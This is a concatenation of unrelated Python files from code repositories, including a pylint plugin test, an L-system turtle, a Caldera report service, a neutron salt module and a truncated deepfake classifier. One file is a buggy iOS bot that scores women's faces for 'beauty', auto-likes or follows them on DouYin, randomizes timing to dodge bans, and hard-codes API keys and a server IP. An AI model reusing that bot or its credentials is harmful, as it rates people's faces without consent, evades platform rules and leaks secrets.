                next(infile)
            for line in infile:
                fields = line.rstrip().split(delimiter)[skipcols:skipcols + ncols]
                # Record the row width for the final reshape.  Setting it per
                # line (instead of after the loop, via a leaked loop variable)
                # avoids a NameError when the file has no data lines.
                iter_loadtxt.rowlength = len(fields)
                for item in fields:
                    yield dtype(item)

    data = np.fromiter(iter_func(), dtype=dtype)
    # Fall back to ncols if the file contained no data rows at all.
    return data.reshape((-1, getattr(iter_loadtxt, 'rowlength', ncols)))
def _voxelize_dump(path):
    """Load an x/y/z point dump and return a dense boolean occupancy grid.

    The cloud is shifted so its minimum corner sits at the origin; each
    integer coordinate present in the file becomes a True voxel.
    """
    coords = iter_loadtxt(path, skiprows=2, skipcols=2).astype(int)
    coords -= coords.min(axis=0)  # shift so the cloud starts at the origin
    grid = np.zeros(coords.max(axis=0) + 1, dtype='bool')
    grid[coords[:, 0], coords[:, 1], coords[:, 2]] = 1
    return grid


if __name__ == '__main__':
    # Guarded so importing this module no longer kicks off a multi-second
    # read of a hard-coded local file.
    t0 = time.time()
    path = r'E:\E_Documents\Research\Computer Vision Collaboration\Erica Lilleodden/indentor dump.pov'
    # OVITO takes 17 seconds to load this file
    a = _voxelize_dump(path)
    print('Time: ', time.time() - t0)
5e4e4c81732ae52aa5f8c6cb2cea24ab58ab47d4 | 1,263 | py | Python | tests/test_plugin.py | winmasta/pylint-exception-var-name-plugin | 32d833970bd5352ce8f4d1defff2e5cfdd78dc96 | [
"MIT"
] | null | null | null | tests/test_plugin.py | winmasta/pylint-exception-var-name-plugin | 32d833970bd5352ce8f4d1defff2e5cfdd78dc96 | [
"MIT"
] | null | null | null | tests/test_plugin.py | winmasta/pylint-exception-var-name-plugin | 32d833970bd5352ce8f4d1defff2e5cfdd78dc96 | [
"MIT"
] | null | null | null | import astroid
import pylint.testutils
from pylint_exception_var_name_plugin import checker
class TestUniqueReturnChecker(pylint.testutils.CheckerTestCase):
    """Checks how ExceptionVarNameChecker judges except-handler bindings."""

    CHECKER_CLASS = checker.ExceptionVarNameChecker

    def test_finds_bad_name(self):
        """A handler bound to ``exc`` must emit bad-exception-var-name."""
        handler = astroid.extract_node(
            """
            try:
                1 / 0
            except ZeroDivisionError as exc: #@
                pass
            """
        )
        expected = pylint.testutils.Message(
            msg_id='bad-exception-var-name', node=handler)
        with self.assertAddsMessages(expected):
            self.checker.visit_excepthandler(handler)

    def test_not_finds_bad_name(self):
        """A handler bound to ``e`` is accepted silently."""
        handler = astroid.extract_node(
            """
            try:
                1 / 0
            except ZeroDivisionError as e: #@
                pass
            """
        )
        with self.assertNoMessages():
            self.checker.visit_excepthandler(handler)

    def test_finds_no_name(self):
        """A handler with no ``as`` binding is accepted silently."""
        handler = astroid.extract_node(
            """
            try:
                1 / 0
            except ZeroDivisionError: #@
                pass
            """
        )
        with self.assertNoMessages():
            self.checker.visit_excepthandler(handler)
| 26.3125 | 107 | 0.529691 | 110 | 1,263 | 5.881818 | 0.363636 | 0.069552 | 0.055641 | 0.088099 | 0.561051 | 0.561051 | 0.561051 | 0.488408 | 0.488408 | 0.299845 | 0 | 0.007823 | 0.392716 | 1,263 | 47 | 108 | 26.87234 | 0.835724 | 0 | 0 | 0.4 | 0 | 0 | 0.026097 | 0.026097 | 0 | 0 | 0 | 0 | 0.15 | 1 | 0.15 | false | 0 | 0.15 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e52b3ff840b6ce7077ecfa1de37a870b3194b6f | 3,525 | py | Python | src/lsys/lturtle.py | robertkist/lsystems_py | 9b0e3bb4530c9a3919da2c77b5da548fb50294d6 | [
"MIT"
] | null | null | null | src/lsys/lturtle.py | robertkist/lsystems_py | 9b0e3bb4530c9a3919da2c77b5da548fb50294d6 | [
"MIT"
] | null | null | null | src/lsys/lturtle.py | robertkist/lsystems_py | 9b0e3bb4530c9a3919da2c77b5da548fb50294d6 | [
"MIT"
] | null | null | null | import math
from typing import Union, Any
class LTurtle:
    """A class to implement a simple Logo-style turtle for drawing l-systems"""
    def __init__(self,
                 px: Union[int, float],
                 py: Union[int, float],
                 rx: Union[int, float],
                 ry: Union[int, float],
                 angle: Union[int, float],
                 distance: int,
                 draw_func: Any) -> None:
        """
        Constructor.
        :param px: start x position on the screen in pixels.
        :param py: start y position on the screen in pixels.
        :param rx: initial orientation vector x component (use 0, 1, -1)
        :param ry: initial orientation vector y component (use 0, 1, -1)
        :param angle: turn angle for + and - commands.
        :param distance: distance in pixels for F command.
        :param draw_func: called when a line should be drawn. Callback param1: line start x, param2: line start y, param3: line end x, param4: line end y
        """
        self.__px: Union[int, float] = px  # current position
        self.__py: Union[int, float] = py
        self.__rx: Union[int, float] = rx  # unit direction vector
        self.__ry: Union[int, float] = ry
        self.__angle: Union[int, float] = angle
        # __set_angle also selects the rotation implementation (fast
        # component-swap for 90 degrees vs. general sin/cos rotation).
        self.__set_angle(self.__angle)
        self.__distance: Union[int, float] = distance
        self.__draw_func: Any = draw_func

    @property
    def px(self) -> Union[int, float]:
        """Returns turtle's x position"""
        return self.__px

    @property
    def py(self) -> Union[int, float]:
        """Returns turtle's y position"""
        return self.__py

    @property
    def rx(self) -> Union[int, float]:
        """Returns turtle's orientation vector's x component"""
        return self.__rx

    @property
    def ry(self) -> Union[int, float]:
        """Returns turtle's orientation vector's y component"""
        return self.__ry

    def forward(self) -> None:
        """Moves the turtle forward and draws a line"""
        ox: Union[int, float] = self.__px
        oy: Union[int, float] = self.__py
        self.__px += self.__rx * self.__distance
        self.__py += self.__ry * self.__distance
        # Report the segment from the old position to the new one.
        self.__draw_func(ox, oy, self.__px, self.__py)

    def left(self) -> None:
        """Rotates the turtle counter-clockwise"""
        self.__rotate_func(self.__angle)

    def right(self) -> None:
        """Rotates the turtle clockwise"""
        self.__rotate_func(-self.__angle)

    def __set_angle(self, a: float) -> None:
        """Sets the turtle's rotational angle and picks the matching rotation routine"""
        self.__angle = a
        if self.__angle == 90:
            self.__rotate_func = self.__rotate_90
        else:
            self.__rotate_func = self.__rotate_any

    def __rotate_any(self, a: float) -> None:
        """Rotates the turtle in any direction by any degrees"""
        # Standard 2D rotation matrix applied to the direction vector.
        a = math.radians(a)
        sin_a = math.sin(a)
        cos_a = math.cos(a)
        xn = self.__rx * cos_a - self.__ry * sin_a
        yn = self.__rx * sin_a + self.__ry * cos_a
        self.__rx = xn
        self.__ry = yn

    def __rotate_90(self, a: float) -> None:
        """
        Rotates the turtle in any direction by 90 degrees.
        This method is much faster as we're just swapping vector components around.
        """
        # Only the sign of *a* matters here; magnitude is assumed to be 90.
        if a < 0:
            dx = self.__ry
            self.__ry = -self.__rx
            self.__rx = dx
        else:
            dx = -self.__ry
            self.__ry = self.__rx
            self.__rx = dx
| 34.558824 | 153 | 0.571348 | 464 | 3,525 | 4.06681 | 0.239224 | 0.072072 | 0.117117 | 0.036036 | 0.372019 | 0.301007 | 0.301007 | 0.229995 | 0.229995 | 0.229995 | 0 | 0.00793 | 0.320284 | 3,525 | 101 | 154 | 34.90099 | 0.779633 | 0.302128 | 0 | 0.125 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.171875 | false | 0 | 0.03125 | 0 | 0.28125 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e54c26a3ddededff2248c316135a3f13e08115f | 2,334 | py | Python | plugins/reporter/app/reporter_svc.py | IGchra/caldera | 75f5a9c3f63139f8f3c6ee6e7cb4ce094e82b1b9 | [
"Apache-2.0"
] | null | null | null | plugins/reporter/app/reporter_svc.py | IGchra/caldera | 75f5a9c3f63139f8f3c6ee6e7cb4ce094e82b1b9 | [
"Apache-2.0"
] | null | null | null | plugins/reporter/app/reporter_svc.py | IGchra/caldera | 75f5a9c3f63139f8f3c6ee6e7cb4ce094e82b1b9 | [
"Apache-2.0"
] | null | null | null | import json
import uuid
import os
from socket import getfqdn
from aiohttp import web
from aiohttp_jinja2 import template
from app.service.auth_svc import check_authorization
# import of own modules
from plugins.reporter.app.detectionreport import create_detection
from plugins.reporter.app.CSVreport import create_csv
##########################################
#### ---------- PARAMETERS ---------- ####
##########################################
class ReporterService:
    """Caldera plugin service that renders and exports operation detection reports."""

    def __init__(self, services, domain=None):
        """
        :param services: dict of core services ('auth_svc', 'data_svc', 'rest_svc').
        :param domain: DNS domain used in generated reports.  Defaults to the
            host's own domain, computed lazily here instead of in the signature:
            the original ``getfqdn().split('.', 1)[1]`` default ran at import
            time and raised IndexError on hosts whose FQDN has no dot.
        """
        self.services = services
        self.auth_svc = self.services.get('auth_svc')
        self.data_svc = self.services.get('data_svc')
        self.rest_svc = self.services.get('rest_svc')
        if domain is None:
            fqdn = getfqdn()
            # Fall back to the bare hostname when there is no domain part.
            domain = fqdn.split('.', 1)[1] if '.' in fqdn else fqdn
        self.domain = domain
        # Root of the reporter plugin directory, derived from this file's path.
        self.path = os.path.dirname(os.path.abspath(__file__)).split('reporter', 1)[0] + 'reporter/'

    @template('reporter.html')
    async def splash(self, request):
        """Render the reporter landing page with operations and saved reports."""
        await self.auth_svc.check_permissions(request)
        operations = [o.display for o in await self.data_svc.locate('operations')]
        reports = []
        for filename in os.listdir(self.path + 'detectionreports'):
            with open(self.path + 'detectionreports/' + filename) as f:
                data = json.load(f)
                reports.append({
                    'id': data['run_id'],
                    'name': data['settings']['testname'] + ': ' + data['settings']['host'] + '(' + data['settings']['platform'] + ')',
                    'start': data['start']
                })
        return dict(operations=sorted(operations, key=lambda o: o['name']), reports=reports)

    @check_authorization
    async def detectionreport(self, request):
        """Build detection reports for an operation and return them as JSON."""
        request_body = json.loads(await request.read())
        report_answer = await self.rest_svc.display_operation_report({'op_id': request_body['operation_id'], 'agent_output': '1'})
        jsonreports = create_detection(report_answer, self.domain, self.path, request_body['tanium'], request_body['cortex'], request_body['qradar'])
        return web.json_response(jsonreports)

    @check_authorization
    async def csvexport(self, request):
        """Export a previously generated detection report as CSV."""
        request_body = json.loads(await request.read())
        csvreport = create_csv(request_body['report_id'], self.path)
        return web.Response(body=csvreport.encode())
| 38.262295 | 149 | 0.628963 | 266 | 2,334 | 5.353383 | 0.360902 | 0.054073 | 0.031601 | 0.037921 | 0.066011 | 0.066011 | 0.066011 | 0.066011 | 0.066011 | 0 | 0 | 0.003215 | 0.200514 | 2,334 | 60 | 150 | 38.9 | 0.759914 | 0.023136 | 0 | 0.095238 | 0 | 0 | 0.104805 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.02381 | false | 0 | 0.214286 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e54ef8675e52df34cced0f2e86826df8b5f7a19 | 11,537 | py | Python | DouYin_wechat_jump_auto_iOS.py | JIANSHULI/Douyin_Auto_iOS | b06cd2524e2f0fa304f4cec268f8192dbe3c0c0a | [
"Apache-2.0"
] | 1 | 2018-12-12T04:07:19.000Z | 2018-12-12T04:07:19.000Z | DouYin_wechat_jump_auto_iOS.py | JIANSHULI/Douyin_Auto_iOS | b06cd2524e2f0fa304f4cec268f8192dbe3c0c0a | [
"Apache-2.0"
] | null | null | null | DouYin_wechat_jump_auto_iOS.py | JIANSHULI/Douyin_Auto_iOS | b06cd2524e2f0fa304f4cec268f8192dbe3c0c0a | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
"""
# === 思路 ===
# 核心:每次落稳之后截图,根据截图算出棋子的坐标和下一个块顶面的中点坐标,
# 根据两个点的距离乘以一个时间系数获得长按的时间
# 识别棋子:靠棋子的颜色来识别位置,通过截图发现最下面一行大概是一条
直线,就从上往下一行一行遍历,比较颜色(颜色用了一个区间来比较)
找到最下面的那一行的所有点,然后求个中点,求好之后再让 Y 轴坐标
减小棋子底盘的一半高度从而得到中心点的坐标
# 识别棋盘:靠底色和方块的色差来做,从分数之下的位置开始,一行一行扫描,
由于圆形的块最顶上是一条线,方形的上面大概是一个点,所以就
用类似识别棋子的做法多识别了几个点求中点,这时候得到了块中点的 X
轴坐标,这时候假设现在棋子在当前块的中心,根据一个通过截图获取的
固定的角度来推出中点的 Y 坐标
# 最后:根据两点的坐标算距离乘以系数来获取长按时间(似乎可以直接用 X 轴距离)
"""
import os
import shutil
import time
import math
import random
import json
from PIL import Image, ImageDraw
import wda
# import wechat_jump_game.common as common
try:
from wechat_jump_game.common import apiutil
from wechat_jump_game.common.compression import resize_image
print('Load from wechat_jump_game.')
except:
from common import debug, config, screenshot, UnicodeStreamFilter
# from common.auto_adb import auto_adb
from common import apiutil
from common.compression import resize_image
print('Load from Douyin-Bot/')
import sys
################################################
def _random_bias(num):
"""
random bias
:param num:
:return:
"""
print('num = ', num)
return random.randint(-num, num)
def pull_screenshot(Use_App='Wechat_Jump', FACE_PATH = '', id=0):
    """Grab a device screenshot via the module-level wda client ``c``.

    Saves to '1.png' for the jump game or FACE_PATH + 'autojump.png' for
    DouYin.  The ``id`` parameter is accepted but unused in this body.
    """
    if 'Wechat_Jump' in Use_App:
        c.screenshot('1.png')
    elif 'DouYin' in Use_App:
        c.screenshot(FACE_PATH + 'autojump.png')
def jump(distance):
    """Long-press at a random point for a time proportional to *distance*.

    NOTE(review): reads ``time_coefficient`` as a module global, but in this
    file it is only assigned as a local inside main() -- calling this would
    raise NameError; confirm and hoist the config values to module scope.
    """
    press_time = distance * time_coefficient / 1000
    print('press time: {}'.format(press_time))
    # Random touch point to make the press look less robotic.
    s.tap_hold(random.uniform(0, 320), random.uniform(64, 320), press_time)
def backup_screenshot(ts):
    """
    Keep a timestamped copy of the screenshot to make debugging failures easier.

    NOTE(review): ``screenshot_backup_dir`` is only assigned as a local inside
    main(); as a module global it is undefined here -- verify.
    """
    if not os.path.isdir(screenshot_backup_dir):
        os.mkdir(screenshot_backup_dir)
    shutil.copy('1.png', '{}{}.png'.format(screenshot_backup_dir, ts))
def save_debug_creenshot(ts, im, piece_x, piece_y, board_x, board_y):
    """Save an annotated copy of the screenshot for debugging.

    Draws the piece->target line, cross-hairs through both points, and a
    circle on each, then writes ``<backup_dir><ts>_d.png``.
    (Function name keeps the original 'creenshot' typo for caller
    compatibility.)
    """
    draw = ImageDraw.Draw(im)
    # Add detailed annotations onto the debug image.
    draw.line((piece_x, piece_y) + (board_x, board_y), fill=2, width=3)
    draw.line((piece_x, 0, piece_x, im.size[1]), fill=(255, 0, 0))
    draw.line((0, piece_y, im.size[0], piece_y), fill=(255, 0, 0))
    draw.line((board_x, 0, board_x, im.size[1]), fill=(0, 0, 255))
    draw.line((0, board_y, im.size[0], board_y), fill=(0, 0, 255))
    draw.ellipse(
        (piece_x - 10, piece_y - 10, piece_x + 10, piece_y + 10),
        fill=(255, 0, 0))
    draw.ellipse(
        (board_x - 10, board_y - 10, board_x + 10, board_y + 10),
        fill=(0, 0, 255))
    del draw
    im.save('{}{}_d.png'.format(screenshot_backup_dir, ts))
def set_button_position(im):
    """
    Point the swipe coordinates at the "play again" button.

    Mutates the module-level swipe_x1/y1/x2/y2 globals; the button's y
    position is scaled from a 1280px-tall reference screenshot.
    """
    global swipe_x1, swipe_y1, swipe_x2, swipe_y2
    w, h = im.size
    left = w / 2
    top = 1003 * (h / 1280.0) + 10
    swipe_x1, swipe_y1, swipe_x2, swipe_y2 = left, top, left, top
def find_piece_and_board(im):
    """Locate the piece and the next board's top centre in screenshot *im*.

    Returns (piece_x, piece_y, board_x, board_y), or four zeros when either
    cannot be found.

    NOTE(review): reads ``under_game_score_y``, ``piece_base_height_1_2`` and
    ``piece_body_width`` as module globals, but this file only assigns them
    as locals inside main() -- verify.
    """
    w, h = im.size
    print("size: {}, {}".format(w, h))
    piece_x_sum = piece_x_c = piece_y_max = 0
    board_x = board_y = 0
    scan_x_border = int(w / 8)  # left/right border when scanning for the piece
    scan_start_y = 0  # y coordinate where scanning starts
    im_pixel = im.load()
    # Probe downward in 50px steps to find scan_start_y.
    for i in range(under_game_score_y, h, 50):
        last_pixel = im_pixel[0, i]
        for j in range(1, w):
            pixel = im_pixel[j, i]
            # Row is not a solid colour: record scan_start_y and bail out.
            if pixel != last_pixel:
                scan_start_y = i - 50
                break
        if scan_start_y:
            break
    print("scan_start_y: ", scan_start_y)
    # Scan down from scan_start_y; the piece should sit in the upper part of
    # the screen, assumed here to be within the top 2/3.
    for i in range(scan_start_y, int(h * 2 / 3)):
        # Narrowing the x range also cuts the scan cost.
        for j in range(scan_x_border, w - scan_x_border):
            pixel = im_pixel[j, i]
            # Colour-match the piece's bottom row and average those points;
            # these hard-coded RGB bands identify the piece colour.
            if (50 < pixel[0] < 60) \
                    and (53 < pixel[1] < 63) \
                    and (95 < pixel[2] < 110):
                piece_x_sum += j
                piece_x_c += 1
                piece_y_max = max(i, piece_y_max)
    if not all((piece_x_sum, piece_x_c)):
        return 0, 0, 0, 0
    piece_x = piece_x_sum / piece_x_c
    piece_y = piece_y_max - piece_base_height_1_2  # move up half the base height
    for i in range(int(h / 3), int(h * 2 / 3)):
        last_pixel = im_pixel[0, i]
        if board_x or board_y:
            break
        board_x_sum = 0
        board_x_c = 0
        for j in range(w):
            pixel = im_pixel[j, i]
            # Skip columns near the piece (fixes the case where the piece's
            # head is taller than the next block).
            if abs(j - piece_x) < piece_body_width:
                continue
            # Colour-delta threshold; also handles the single-line artefact
            # at the top of dome-shaped blocks.
            if abs(pixel[0] - last_pixel[0]) \
                    + abs(pixel[1] - last_pixel[1]) \
                    + abs(pixel[2] - last_pixel[2]) > 10:
                board_x_sum += j
                board_x_c += 1
        if board_x_sum:
            board_x = board_x_sum / board_x_c
            # Use the board's actual projection angle (30 degrees, so
            # tan 30 = sqrt(3)/3) to derive the centre's y coordinate.
            board_y = piece_y - abs(board_x - piece_x) * math.sqrt(3) / 3
    if not all((board_x, board_y)):
        return 0, 0, 0, 0
    return piece_x, piece_y, board_x, board_y
######### Which App to Use ##########
# Switch between the two supported automation targets.
App_List = ['DouYin', 'Wechat_Jump']
Use_App = 'DouYin'
# Module-level WebDriverAgent connection; also recreated inside main().
c = wda.Client(url='http://18.189.58.186:8100')
s = c.session()
if len(sys.argv) == 1:
    # No CLI args: read the screen size from the device, falling back to an
    # iPhone-sized default when the session is unavailable.
    try:
        w = s.window_size()[0]
        h = s.window_size()[1]
        Follow_Sign_x = w/1080 * 1050
        Follow_Sign_y = h/1920 * 920
    except:
        w = 750 / 2
        h = 1334 / 2
        Follow_Sign_x = 730 / 2
        Follow_Sign_y = 640 / 2
else:
    # Screen width/height supplied on the command line.
    w = int(sys.argv[1])
    h = int(sys.argv[2])
    Follow_Sign_x = w / 1080 * 990
    Follow_Sign_y = h / 1920 * 950
print('Follow_Sign_x: %s; Follow_Sign_y: %s'%(Follow_Sign_x, Follow_Sign_y))
def main():
    """Dispatch to the configured app routine.

    The 'Wechat_Jump' branch plays the WeChat jump mini-game in a loop; the
    'DouYin' branch scrolls DouYin, scores faces with the Tencent AI API and
    likes/follows attractive ones.
    """
    if 'Wechat_Jump' in Use_App:
        ####################################################################
        ######################## Wechat_Jump ###############################
        with open('config.json', 'r') as f:
            config = json.load(f)
        # Magic number; without it the script may not run correctly -- tune
        # it from an actual screenshot, top to bottom.
        under_game_score_y = config['under_game_score_y']
        # Long-press time coefficient; tune for your device.
        press_coefficient = config['press_coefficient']
        # Half the piece's base height; may need tuning.
        piece_base_height_1_2 = config['piece_base_height_1_2']
        # Piece width; slightly larger than measured is safer.
        piece_body_width = config['piece_body_width']
        time_coefficient = config['press_coefficient']
        # NOTE(review): the config values above are locals of main(), but
        # jump(), find_piece_and_board() and backup_screenshot() read
        # same-named module globals -- this branch would raise NameError at
        # runtime; confirm and hoist them to module scope.
        # Press start point; set to the "play again" button for auto-restart.
        swipe = config.get('swipe', {
            "x1": 320,
            "y1": 410,
            "x2": 320,
            "y2": 410
        })
        VERSION = "1.1.4"
        screenshot_backup_dir = 'screenshot_backups/'
        if not os.path.isdir(screenshot_backup_dir):
            os.mkdir(screenshot_backup_dir)
        while True:
            pull_screenshot()
            im = Image.open("./1.png")
            # Locate the piece and the target board.
            piece_x, piece_y, board_x, board_y = find_piece_and_board(im)
            ts = int(time.time())
            print(ts, piece_x, piece_y, board_x, board_y)
            if piece_x == 0:
                return
            set_button_position(im)
            distance = math.sqrt(
                (board_x - piece_x) ** 2 + (board_y - piece_y) ** 2)
            jump(distance)
            save_debug_creenshot(ts, im, piece_x, piece_y, board_x, board_y)
            backup_screenshot(ts)
            # Wait a little extra so the piece has settled before the next
            # screenshot; randomized to reduce the ban risk.
            time.sleep(random.uniform(1, 1.1))
    elif 'DouYin' in Use_App:
        #####################################################################
        ########################### DouYin ##################################
        # Apply for API credentials at http://ai.qq.com
        # NOTE(review): credentials are hard-coded here -- consider moving
        # them to config/environment.
        AppID = '1106858595'
        AppKey = 'bNUNgOpY6AeeJjFu'
        FACE_PATH = 'face/'
        Max_Try = 10
        Girls = True
        Follow_Her = False
        Like_Her = True
        # Beauty-score threshold.
        BEAUTY_THRESHOLD = 80
        Likes_max = 1
        Save_Origin = True
        Save_Whole = True
        Save_Face = True
        for i in range(Max_Try):
            c = wda.Client(url='http://18.189.58.186:8100')  # Please replace this by your own url from WebDriverAgent output.
            s = c.session()
            # s.swipe_up_pro()
            time.sleep(3)
            pull_screenshot(Use_App=Use_App, FACE_PATH=FACE_PATH)
            if Save_Origin:
                im = Image.open(FACE_PATH + 'autojump.png')
                im.save(FACE_PATH + 'autojump_%s.png'%(i))
            try:
                resize_image(FACE_PATH + 'autojump.png', FACE_PATH + 'optimized.png', 1024 * 1024)
                with open(FACE_PATH + 'optimized.png', 'rb') as bin_data:
                    image_data = bin_data.read()
            except:
                # Fall back to the unresized screenshot if compression fails.
                with open(FACE_PATH + 'autojump.png', 'rb') as bin_data:
                    image_data = bin_data.read()
            ai_obj = apiutil.AiPlat(AppID, AppKey)
            rsp = ai_obj.face_detectface(image_data, 0)
            if rsp['ret'] == 0:
                beauty = 0
                for face in rsp['data']['face_list']:
                    print(face)
                    face_area = (face['x'], face['y'], face['x'] + face['width'], face['y'] + face['height'])
                    print(face_area)
                    img = Image.open(FACE_PATH + "optimized.png")
                    if Save_Whole:
                        img.save(FACE_PATH + face['face_id'] + '_Whole.png')
                    if Save_Face:
                        cropped_img = img.crop(face_area).convert('RGB')
                        cropped_img.save(FACE_PATH + face['face_id'] + '.png')
                    # Gender filter: keep the best score for the wanted gender.
                    if Girls:
                        if face['beauty'] > beauty and face['gender'] < 50:
                            beauty = face['beauty']
                    else:
                        if face['beauty'] > beauty and face['gender'] > 50:
                            beauty = face['beauty']
                # Pretty enough -- like (and optionally follow).
                if beauty > BEAUTY_THRESHOLD:
                    print('发现漂亮妹子!!!')
                    print('颜值: %s' %beauty)
                    if Like_Her:
                        # NOTE(review): this loop variable `i` shadows the
                        # outer attempt counter used for autojump_%s.png.
                        for i in range(int((beauty - BEAUTY_THRESHOLD)/((100 - BEAUTY_THRESHOLD)/Likes_max) + 1)):
                            s.double_tap(x=w/2, y=h/2)
                            print('Heart!')
                            # time.sleep(0.11)
                    if Follow_Her:
                        s.tap(x=Follow_Sign_x, y=Follow_Sign_y)
                        print('Follow!')
                        # time.sleep(0.2)
                    time.sleep(3)
                else:
                    print('颜值: %s' % beauty)
            try:
                s.swipe_up_pro()
            except:
                # Reconnect once if the session went stale, then retry the swipe.
                time.sleep(10)
                c = wda.Client(url='http://18.189.58.186:8100')
                s = c.session()
                try:
                    s.swipe_up_pro()
                except:
                    pass
            time.sleep(1)


if __name__ == '__main__':
    main()
| 32.407303 | 125 | 0.515299 | 1,447 | 11,537 | 3.87906 | 0.228749 | 0.024586 | 0.017638 | 0.017103 | 0.29307 | 0.206129 | 0.159808 | 0.139141 | 0.087476 | 0.087476 | 0 | 0.043663 | 0.346884 | 11,537 | 355 | 126 | 32.498592 | 0.700995 | 0.120569 | 0 | 0.216102 | 0 | 0 | 0.074276 | 0.002157 | 0 | 0 | 0 | 0 | 0 | 1 | 0.033898 | false | 0.004237 | 0.059322 | 0 | 0.114407 | 0.063559 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e553930e52041c6112f0876fab58cc7d814a1bf | 1,165 | py | Python | _modules/neutronv2/subnetpools.py | NDPF/salt-formula-neutron | 758f3350fa541a41174105c92c0b9cceb6951d81 | [
"Apache-2.0"
] | 3 | 2017-06-30T18:09:44.000Z | 2017-11-04T18:24:39.000Z | _modules/neutronv2/subnetpools.py | NDPF/salt-formula-neutron | 758f3350fa541a41174105c92c0b9cceb6951d81 | [
"Apache-2.0"
] | 10 | 2017-02-25T21:39:01.000Z | 2018-09-19T07:53:46.000Z | _modules/neutronv2/subnetpools.py | NDPF/salt-formula-neutron | 758f3350fa541a41174105c92c0b9cceb6951d81 | [
"Apache-2.0"
] | 21 | 2017-02-01T18:12:51.000Z | 2019-04-29T09:29:01.000Z | from neutronv2.common import send
from neutronv2.arg_converter import get_by_name_or_uuid_multiple
try:
from urllib.parse import urlencode
except ImportError:
from urllib import urlencode
@get_by_name_or_uuid_multiple([('subnetpool', 'subnetpool_id')])
@send('get')
def subnetpool_get_details(subnetpool_id, **kwargs):
    """Build the GET request for one subnet pool's details.

    Extra keyword arguments become URL query parameters.
    """
    query = urlencode(kwargs)
    return '/subnetpools/{}?{}'.format(subnetpool_id, query), {}
@get_by_name_or_uuid_multiple([('subnetpool', 'subnetpool_id')])
@send('put')
def subnetpool_update(subnetpool_id, **kwargs):
    """Build the PUT request that updates a subnet pool.

    Keyword arguments form the 'subnetpool' request body.
    """
    body = {'subnetpool': kwargs}
    return '/subnetpools/{}'.format(subnetpool_id), {'json': body}
@get_by_name_or_uuid_multiple([('subnetpool', 'subnetpool_id')])
@send('delete')
def subnetpool_delete(subnetpool_id, **kwargs):
    """Build the DELETE request for a subnet pool (extra kwargs are ignored)."""
    return '/subnetpools/{}'.format(subnetpool_id), {}
@send('post')
def subnetpool_create(name, prefixes, **kwargs):
    """Build the POST request that creates a subnet pool.

    *name* and *prefixes* are mandatory; any extra keyword arguments are
    merged into the 'subnetpool' request body.
    """
    pool = {'name': name, 'prefixes': prefixes}
    pool.update(kwargs)
    return '/subnetpools', {'json': {'subnetpool': pool}}
| 24.787234 | 64 | 0.663519 | 132 | 1,165 | 5.590909 | 0.265152 | 0.146341 | 0.04878 | 0.059621 | 0.495935 | 0.433604 | 0.402439 | 0.402439 | 0.199187 | 0.199187 | 0 | 0.002112 | 0.187124 | 1,165 | 46 | 65 | 25.326087 | 0.777191 | 0 | 0 | 0.297297 | 0 | 0 | 0.167382 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.108108 | false | 0 | 0.135135 | 0 | 0.351351 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e564de62423749988de8758a4e46d97633e7c42 | 4,084 | py | Python | deepfakes-clasificador.py | sramirezaraya/deepfakes-detection | ed18b807958649027d224df077778a48d3e1655c | [
"Apache-2.0"
] | 1 | 2021-08-02T00:41:20.000Z | 2021-08-02T00:41:20.000Z | deepfakes-clasificador.py | sramirezaraya/deepfakes-detection | ed18b807958649027d224df077778a48d3e1655c | [
"Apache-2.0"
] | null | null | null | deepfakes-clasificador.py | sramirezaraya/deepfakes-detection | ed18b807958649027d224df077778a48d3e1655c | [
"Apache-2.0"
] | null | null | null | import tkinter
from tkinter import *
from PIL import Image, ImageTk
from tkinter.filedialog import askopenfilename
import cv2
from keras.models import load_model
import numpy as np
import keras
import tensorflow
import os
from mtcnn import MTCNN
# Build the main application window.
ventana = tkinter.Tk()
ventana.geometry("768x687")
ventana.configure(bg="white")
ventana.title("Sistema Clasificador de Deepfakes")
# Print framework versions for reproducibility of results.
print(keras.__version__)
print(tensorflow.__version__)
# Load the deepfake classifier weights and the MTCNN face detector; both run
# at import time, so starting the app requires ./modelos/VGG16.h5 to exist.
path = "./modelos/"
name_model = "VGG16.h5"
model = load_model(os.path.join(path,name_model))
detector = MTCNN()
def crop(box, image):
    """Crop a face bounding box out of *image* and resize it to 224x224.

    :param box: MTCNN-style box [x, y, width, height]; slightly negative
        origins (which MTCNN can report) are clamped to the frame.
    :param image: RGB frame as a numpy array.
    :return: 224x224 crop suitable for the classifier.
    :raises ValueError: if *image* is missing or empty.  (The original body
        contained `if image.size == 0: pass` style checks that did nothing.)
    """
    x0, y0, w, h = box[0], box[1], box[2], box[3]
    if x0 < 0:
        x0 = 0
    if y0 < 0:
        y0 = 0
